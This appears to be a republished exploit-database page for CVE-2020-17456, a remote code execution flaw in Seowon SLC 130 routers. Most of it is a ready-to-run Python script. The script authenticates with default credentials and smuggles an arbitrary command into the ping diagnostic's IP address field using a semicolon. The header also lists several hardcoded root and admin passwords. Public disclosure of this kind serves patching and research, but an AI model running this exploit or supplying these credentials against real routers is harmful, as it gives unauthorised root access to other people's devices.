Seowon SlC 130 Router Remote Code Execution ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on August 22nd, 2020 📆 | 8113 Views ⚑

0

Seowon SlC 130 Router Remote Code Execution ≈ Packet Storm

# Exploit Title: Seowon SlC 130 Router – Remote Code Execution
# Author: maj0rmil4d – Ali Jalalat
# Author website: https://secureguy.ir
# Date: 2020-08-20
# Vendor Homepage: seowonintech.co.kr
# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kind=B05&middle_kind=B05_29
# CVE: CVE-2020-17456
# Version: Lync:Mac firmware 1.0.1, likely earlier versions
# Tested on: Windows 10 – Parrot sec

# Description:
# user can run arbitrary commands on the router as root !
# as there are already some hardcoded credentials so there is an easy to trigger exploit

# credentials :
# user => VIP
# pwd => V!P83869000

# user => Root
# pwd => PWDd0N~WH*4G#DN

# user => root
# pwd => gksrmf28

# user => admin
# pwd => admin
#

# A write-up can be found at:
# https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/

import requests
import sys

host = sys.argv[1]

session = requests.Session()

header = {

“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0”,
“Accept”: “text/html,application/xhtml+xml,application/xml;q:0.9,image/webp,*/*;q:0.8”,
“Accept-Language”: “en-US,en;q:0.5”,
“Accept-Encoding”: “gzip, deflate”,
“Content-Type”: “pplication/x-www-form-urlencoded”,
“Content-Length”: “132”,
“Origin”: “http://192.168.1.1”,
“Connection”: “close”,
“Referer”: “http://192.168.1.1/”,
“Upgrade-Insecure-Requests”: “1”
}

datas = {

“Command”:”Submit”,
“expires”:”Wed%2C+12+Aug+2020+15%3A20%3A05+GMT”,
“browserTime”:”081119502020″,
“currentTime”:”1597159205″,
“user”:”admin”,
“password”:”admin”
}

#auth

session.post(host+”/cgi-bin/login.cgi” , headers=header , data = datas)

#rce

cmd = sys.argv[2]

rce_data = {

“Command”:”Diagnostic”,
“traceMode”:”ping”,
“reportIpOnly”:””,
“pingIpAddr”:”;”.encode(“ISO-8859-1”).decode()+cmd,
“pingPktSize”:”56″,
“pingTimeout”:”30″,
“pingCount”:”4″,
“maxTTLCnt”:”30″,
“queriesCnt”:”3″,
“reportIpOnlyCheckbox”:”on”,
“btnApply”:”Apply”,
“T”:”1597160664082″
}

rce = session.post(host+”/cgi-bin/system_log.cgi” , headers=header , data = rce_data)

print(“one line out put of ur command => ” + rce.text.split(‘!’)[1].split(‘[‘)[2].split(“n”)[0])

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...